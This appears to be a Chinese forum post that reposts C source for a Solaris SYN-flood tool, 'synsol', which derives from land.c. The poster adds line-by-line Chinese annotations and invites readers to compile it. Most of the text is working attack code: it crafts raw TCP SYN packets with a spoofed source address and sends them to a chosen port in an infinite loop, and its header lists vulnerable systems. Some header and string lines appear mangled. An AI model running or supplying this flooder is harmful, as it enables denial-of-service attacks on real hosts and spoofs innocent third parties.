大家试着读一读,看是否能读懂,不懂可以给我留言。
我加的有中文注释。
/* Syn Attack against a port for Solaris */
/* Original land attack, land.c by m3lt, FLC */
/* Ported to 44BSD by blast and jerm */
/* Ported to Solaris by ziro antagonist */
/* Referenced flood.c by unknown author */
/* Converted into a syn attack against one port by CRG */
/* Please use this for educational purposes only */
/* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */
/* Additional notes: */
/* Successfully compiled on Solaris 2.51 and 2.6 */
/* Runs: synsol */
/* */
/* Tested it on: Solaris 2.6 */
/* */
/* Attacked against: */
/* Linux 2.0.33 - vulnerable */
/* Linux 2.0.30 - vulnerable */
/* Linux 1.2.13 - vulnerable */
/* Solaris 2.4 - vulnerable */
/* Solaris 2.5.1 - vulnerable */
/* SunOS 4.1.3_U3 - vulnerable */
/* Solaris 2.6 - not vulnerable */
/* */
/* Most of these test machines are not patched because they */
/* are in test lab. I tested the program against port 23 and */
/* every once in awhile I did get through. */
/* */
/* Direct any comments, questions, improvements to */
/*
[email protected] */
/* http://www.genocide2600.com/~tattooman/ */
/* Your emails will be forwarded to the author, who wishes */
/* to remain known only as CRG (no email addy or URL) */
/*jjgirl:上面的注释的不用说了!*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*jjgirl:上面是头文件!*/
unsigned long srcport;
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
/*jjgirl:定义一个伪装地址的结构!*/
u_short checksum(u_short * data,u_short length)
{
int nleft = length;
int sum=0;
unsigned short *w = data;
unsigned short value = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(unsigned char *) (&value) = *(unsigned char *) w;
sum += value;
}
sum = (sum >>16) + (sum & 0xffff);
sum += (sum >> 16);
value = ~sum;
return(value);
}
/*jjgirl:上面校验文件!包头是需要校验的,CRC校验!*/
int main(int argc,char * * argv)
{/*jjgirl:主程序开始了!*/
struct sockaddr_in sin;
struct sockaddr_in din;
struct hostent * hoste;
struct hostent * host1;
int j,sock,foo, flooddot=1;
char buffer[40];
struct ip * ipheader=(struct ip *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
struct pseudohdr pseudoheader;
/*jjgirl:上面定义变量!*/
fprintf(stderr,""Syn attack against one port.(Infinite)
"");
if(argc<4)
{
fprintf(stderr,""usage: %s
"",argv[0]);
return(-1);
}
/*jjgirl:上面是判断参数!*/
fprintf(stderr,""%s:%s is being syn''d attacked by %s.
"",argv[1],argv[2],argv[3]);
bzero(&sin,sizeof(struct sockaddr_in)); /*write sizeof to &sin*/
sin.sin_family=AF_INET;
if((host1=gethostbyname(argv[3]))!=NULL)
bcopy(host1->h_addr,&din.sin_addr,host1->h_length);
else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1)
{
fprintf(stderr,""unknown source host %s
"",argv[3]);
return(-1);
}
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,""unknown destination host %s
"",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,""unknown port %s
"",argv[2]);
return(-1);
}
/*jjgirl:上面是给sockaddr_in结构赋值,需要指明协议,端口号!*/
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,""couldn''t allocate raw socket
"");
return(-1);
}
/*jjgirl:上面开始Socket了!*/
foo=1;
if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1)
{
fprintf(stderr,""couldn''t set raw header on socket
"");
return(-1);
}
/*jjgirl:上面是为了重构报头!*/
for(j=1;j>0;j++)
{
bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
ipheader->ip_v=4;
ipheader->ip_tos=0;
ipheader->ip_hl=sizeof(struct ip)/4;
ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
ipheader->ip_id=htons(random());
ipheader->ip_ttl=30; /*255;*/
ipheader->ip_p=IPPROTO_TCP;
ipheader->ip_sum=0;
ipheader->ip_src=din.sin_addr;
ipheader->ip_dst=sin.sin_addr;
tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0x28374839);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
tcpheader->th_sum=0;
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=din.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
/*jjgirl:上面是重构报头!*/
srcport= (10000.0*random()/(15000+1.0));
/*jjgirl:端口当然要变!*/
if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
/*jjgirl:攻击开始!*/
{
fprintf(stderr,""couldn''t send packet,%d
"",errno);
return(-1);
}
usleep(2);
if (!(flooddot = (flooddot+1)%(1)))
{fprintf(stdout,""."");fflush(stdout);}
/*jjgirl:显示次数! Jjgirl 把上面一句,改为如下两句,增加显示效果,随你的便!
{fprintf(stdout,"".%4d"",j);fflush(stdout);}
int k=j; if((k%10)==0) printf(""
""); */
} /*The end of the infinite loop*/
close(sock);
return(0);
}
/*jjgirl:结束!编译试试吧!如果有看不懂可以给我留言,或来信
[email protected],或复习前面的课程!*/
/*jjgirl:若有人引用本文,请事先通知,并请保持完整性!*/